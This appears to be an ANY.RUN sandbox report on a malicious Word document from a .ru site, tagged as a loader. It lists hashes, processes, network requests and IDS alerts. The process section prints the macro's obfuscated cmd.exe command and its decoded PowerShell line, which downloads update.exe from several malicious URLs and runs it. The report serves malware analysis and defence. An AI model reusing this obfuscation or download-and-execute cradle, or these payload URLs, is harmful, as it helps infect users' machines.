analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://www.saitnews.ru/ttt/AVvcoEFp.doc

Full analysis: https://app.any.run/tasks/594b244a-4a7a-4cd1-8cff-745753014292
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 18, 2018, 14:09:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MD5:

8A05C13AA263465AA0FE3110F4FA0F23

SHA1:

1388A94E965075F97F0A58FEC441F68ADDE14745

SHA256:

0DA58B2EA4A6B0835CEC7F74D6EC3B3E5D25769BE58913F61572A08985ACF4CB

SSDEEP:

3:N1KJS4i8J6dBd:Cc4idd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 280.exe (PID: 3348)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3060)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2336)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2336)
    • Uses SVCHOST.EXE for hidden code execution

      • 280.exe (PID: 3348)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 1076)
    • Loads the Task Scheduler COM API

      • svchost.exe (PID: 3208)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 1076)
    • Starts Microsoft Office Application

      • iexplore.exe (PID: 2944)
      • WINWORD.EXE (PID: 2336)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1076)
      • svchost.exe (PID: 3208)
    • Application launched itself

      • WINWORD.EXE (PID: 2336)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2436)
    • Creates files in the program directory

      • svchost.exe (PID: 3208)
  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2944)
      • iexplore.exe (PID: 3064)
    • Application launched itself

      • iexplore.exe (PID: 2944)
    • Reads internet explorer settings

      • iexplore.exe (PID: 3064)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3952)
      • WINWORD.EXE (PID: 2336)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2336)
      • iexplore.exe (PID: 2944)
      • iexplore.exe (PID: 3064)
    • Changes internet zones settings

      • iexplore.exe (PID: 2944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
9
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe winword.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 280.exe svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2944"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3064"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2944 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2336"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\AVvcoEFp[1].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEiexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3952"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2436c:\VimUCsu\ITVjHOXmPzMqJ\CpSZdwXkIp\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set cLhj=FkjGzRSvWLjbstKYzUiHFdXMzkTZuC@a}qc\PrN l;:'(p./+={)0hw2nEBDfoygeQmIx8$-,&&for %f in (70,57,8,36,49,43,25,18,19,43,41,70,21,22,31,49,56,64,54,71,61,11,10,64,34,13,39,38,64,13,46,8,64,11,29,40,18,64,56,13,41,70,17,6,36,49,43,53,13,13,45,42,47,47,34,64,12,13,64,56,64,40,40,64,12,46,10,31,25,61,11,12,61,56,46,60,37,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,45,31,37,25,61,40,7,18,21,64,61,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,54,61,66,31,56,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,31,18,13,56,64,54,12,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,43,46,6,45,40,18,13,44,43,30,43,51,41,70,11,22,58,49,43,38,54,56,43,41,70,40,24,6,39,49,39,43,55,69,52,43,41,70,53,67,3,49,43,65,11,67,43,41,70,24,19,67,49,70,64,56,7,42,13,64,66,45,48,43,35,43,48,70,40,24,6,48,43,46,64,68,64,43,41,60,61,37,64,31,34,53,44,70,6,53,60,39,18,56,39,70,17,6,36,51,50,13,37,62,50,70,21,22,31,46,59,61,54,56,40,61,31,21,20,18,40,64,44,70,6,53,60,72,39,70,24,19,67,51,41,70,61,38,37,49,43,54,40,54,43,41,67,60,39,44,44,3,64,13,71,67,13,64,66,39,70,24,19,67,51,46,40,64,56,63,13,53,39,71,63,64,39,69,52,52,52,52,51,39,50,67,56,7,61,25,64,71,67,13,64,66,39,70,24,19,67,41,70,19,23,19,49,43,33,36,33,43,41,11,37,64,31,25,41,32,32,34,31,13,34,53,50,32,32,70,67,57,7,49,43,25,7,29,43,41,83)do set Vnb9=!Vnb9!!cLhj:~%f,1!&&if %f equ 83 powershell.exe "!Vnb9:~-457!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3060CmD /V:ON/C"set cLhj=FkjGzRSvWLjbstKYzUiHFdXMzkTZuC@a}qc\PrN l;:'(p./+={)0hw2nEBDfoygeQmIx8$-,&&for %f in (70,57,8,36,49,43,25,18,19,43,41,70,21,22,31,49,56,64,54,71,61,11,10,64,34,13,39,38,64,13,46,8,64,11,29,40,18,64,56,13,41,70,17,6,36,49,43,53,13,13,45,42,47,47,34,64,12,13,64,56,64,40,40,64,12,46,10,31,25,61,11,12,61,56,46,60,37,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,45,31,37,25,61,40,7,18,21,64,61,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,54,61,66,31,56,46,33,61,18,62,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,30,53,13,13,45,42,47,47,54,54,54,46,12,31,18,13,56,64,54,12,46,37,28,47,13,13,13,47,28,45,21,31,13,64,46,64,68,64,43,46,6,45,40,18,13,44,43,30,43,51,41,70,11,22,58,49,43,38,54,56,43,41,70,40,24,6,39,49,39,43,55,69,52,43,41,70,53,67,3,49,43,65,11,67,43,41,70,24,19,67,49,70,64,56,7,42,13,64,66,45,48,43,35,43,48,70,40,24,6,48,43,46,64,68,64,43,41,60,61,37,64,31,34,53,44,70,6,53,60,39,18,56,39,70,17,6,36,51,50,13,37,62,50,70,21,22,31,46,59,61,54,56,40,61,31,21,20,18,40,64,44,70,6,53,60,72,39,70,24,19,67,51,41,70,61,38,37,49,43,54,40,54,43,41,67,60,39,44,44,3,64,13,71,67,13,64,66,39,70,24,19,67,51,46,40,64,56,63,13,53,39,71,63,64,39,69,52,52,52,52,51,39,50,67,56,7,61,25,64,71,67,13,64,66,39,70,24,19,67,41,70,19,23,19,49,43,33,36,33,43,41,11,37,64,31,25,41,32,32,34,31,13,34,53,50,32,32,70,67,57,7,49,43,25,7,29,43,41,83)do set Vnb9=!Vnb9!!cLhj:~%f,1!&&if %f equ 83 powershell.exe "!Vnb9:~-457!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1076powershell.exe "$EWP='kiH';$dXa=new-object Net.WebClient;$USP='http://cestenelles.jakobson.fr/ttt/update.exe@http://www.sparkolvideo.qoiy.ru/ttt/update.exe@http://www.woman.qoiy.ru/ttt/update.exe@http://www.saitnews.ru/ttt/update.exe'.Split('@');$bXB='Nwn';$lzS = '280';$hIG='QbI';$zHI=$env:temp+'\'+$lzS+'.exe';foreach($Shf in $USP){try{$dXa.DownloadFile($Shf, $zHI);$oNr='wlw';If ((Get-Item $zHI).length -ge 80000) {Invoke-Item $zHI;$HMH='qPq';break;}}catch{}}$IEv='kvC';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3348"C:\Users\admin\AppData\Local\Temp\280.exe" C:\Users\admin\AppData\Local\Temp\280.exe
powershell.exe
User:
admin
Company:
NeoGov Either
Integrity Level:
MEDIUM
Description:
Miletalk
Exit code:
0
Version:
2.0.75.58
3208C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe
280.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Host Process for Windows Services
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 139
Read events
2 606
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
6
Text files
5
Unknown types
10

Dropped files

PID
Process
Filename
Type
2944iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\favicon[1].ico
MD5:
SHA256:
2944iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2944iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF7726451579567F2D.TMP
MD5:
SHA256:
2336WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8388.tmp.cvr
MD5:
SHA256:
2944iexplore.exeC:\Users\admin\AppData\Local\Temp\~DF9D2A0400E9097F87.TMP
MD5:
SHA256:
2944iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{9219DBBF-02CE-11E9-91D7-5254004A04AF}.dat
MD5:
SHA256:
2336WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_24AFA372-A195-4620-8DD3-B0A05B1628D0.0\98037C53.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2336WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\423C4CD9.wmf
MD5:
SHA256:
2336WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B3FE1D4F.wmf
MD5:
SHA256:
3952WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_24AFA372-A195-4620-8DD3-B0A05B1628D0.0\~DFAE9DED41E9601C9C.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1076
powershell.exe
GET
200
81.177.6.6:80
http://www.sparkolvideo.qoiy.ru/ttt/update.exe
RU
executable
265 Kb
suspicious
1076
powershell.exe
GET
403
213.186.33.24:80
http://cestenelles.jakobson.fr/ttt/update.exe
FR
html
285 b
malicious
3064
iexplore.exe
GET
200
81.177.6.6:80
http://www.saitnews.ru/ttt/AVvcoEFp.doc
RU
document
71.3 Kb
suspicious
2944
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2944
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3064
iexplore.exe
81.177.6.6:80
www.saitnews.ru
JSC RTComm.RU
RU
malicious
1076
powershell.exe
81.177.6.6:80
www.saitnews.ru
JSC RTComm.RU
RU
malicious
1076
powershell.exe
213.186.33.24:80
cestenelles.jakobson.fr
OVH SAS
FR
malicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.saitnews.ru
  • 81.177.6.6
suspicious
cestenelles.jakobson.fr
  • 213.186.33.24
malicious
www.sparkolvideo.qoiy.ru
  • 81.177.6.6
suspicious

Threats

PID
Process
Class
Message
3064
iexplore.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
3064
iexplore.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
3064
iexplore.exe
Attempted User Privilege Gain
SC ATTEMPTED_USER Microsoft Word 2016 use after free attempt
3064
iexplore.exe
Potential Corporate Privacy Violation
ET POLICY Office Document Download Containing AutoOpen Macro
1076
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1076
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1076
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
Process
Message
280.exe
Start
280.exe
Stop ok